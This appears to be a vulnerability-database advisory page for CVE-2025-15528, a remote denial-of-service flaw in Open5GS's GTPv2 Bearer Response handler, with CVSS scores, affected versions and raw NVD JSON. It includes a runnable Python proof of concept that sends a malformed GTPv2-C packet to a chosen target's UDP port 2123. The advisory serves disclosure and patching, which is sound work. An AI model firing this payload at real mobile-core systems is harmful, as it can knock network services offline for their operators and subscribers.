Security Vulnerability Report
中文
CVE-2025-15528 CVSS 5.3 MEDIUM

CVE-2025-15528

Published: 2026-01-16 22:16:18
Last Modified: 2026-02-23 09:16:28
Source: [email protected]

Description

A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 98f76e98df35cd6a35e868aa62715db7f8141ac1. A patch should be applied to remediate this issue.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:* - VULNERABLE
Open5GS < 2.7.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
""" CVE-2025-15528 PoC - Open5GS GTPv2 Bearer Response DoS This PoC demonstrates sending a malformed GTPv2 Bearer Response to trigger denial of service in Open5GS <= 2.7.6 Note: For authorized security testing only """ import socket import struct import random def build_gtpv2_header(teid, message_type, seq_num): """Build GTPv2-C header""" # Version (1) + Flag (1) + Message Type (1) + Length (2) version_flag = 0x48 # Version=1, TEID present=1, Piggybacking=0 header = struct.pack('!BBH', version_flag, message_type, 0x0004 # Length of TEID + sequence + spare ) # TEID (4 bytes) header += struct.pack('!I', teid) # Sequence number (3 bytes) + Spare (1 byte) header += struct.pack('!I', seq_num)[1:] + b'\x00' return header def send_malformed_bearer_response(target_ip, target_port=2123): """ Send malformed GTPv2 Bearer Response to trigger DoS """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) # GTPv2-C Message Type for Bearer Response is 0x36 header = build_gtpv2_header( teid=0x00000000, # Control plane TEID message_type=0x36, # Bearer Response seq_num=random.randint(0, 0xFFFFFF) ) # Malformed IE (Information Element) with invalid values # IE Type for Bearer Context (0x57) ie_type_bearer_context = 0x57 # Invalid length to cause parsing error ie_data = b'\x00' * 4 # Truncated/malformed data ie = struct.pack('!BBH', ie_type_bearer_context, 0x00, len(ie_data)) + ie_data packet = header + ie try: sock.sendto(packet, (target_ip, target_port)) print(f"[+] Malformed GTPv2 Bearer Response sent to {target_ip}:{target_port}") print(f"[+] Packet length: {len(packet)} bytes") return True except Exception as e: print(f"[-] Error: {e}") return False finally: sock.close() if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_15528_poc.py <target_ip>") sys.exit(1) target = sys.argv[1] send_malformed_bearer_response(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15528", "sourceIdentifier": "[email protected]", "published": "2026-01-16T22:16:18.250", "lastModified": "2026-02-23T09:16:27.500", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. Such manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 98f76e98df35cd6a35e868aa62715db7f8141ac1. A patch should be applied to remediate this issue."}, {"lang": "es", "value": "Una vulnerabilidad ha sido encontrada en Open5GS hasta la versión 2.7.6. Afectada por esta vulnerabilidad es una funcionalidad desconocida del componente GTPv2 Bearer Response Handler. Dicha manipulación lleva a denegación de servicio. El ataque puede ser lanzado remotamente. El exploit ha sido divulgado al público y puede ser usado. El nombre del parche es 98f76e98df35cd6a35e868aa62715db7f8141ac1. Un parche debería ser aplicado para remediar este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:open5gs:open5gs:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.7.6", "matchCriteriaId": "9C77332A-BAA3-4FE7-A237-B87F175C6F48"}]}]}], "references": [{"url": "https://github.com/open5gs/open5gs/", "source": "[email protected]"}, {"url": "https://github.com/open5gs/open5gs/commit/98f76e98df35cd6a35e868aa62715db7f8141ac1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open5gs/open5gs/issues/4225", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/open5gs/open5gs/issu ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.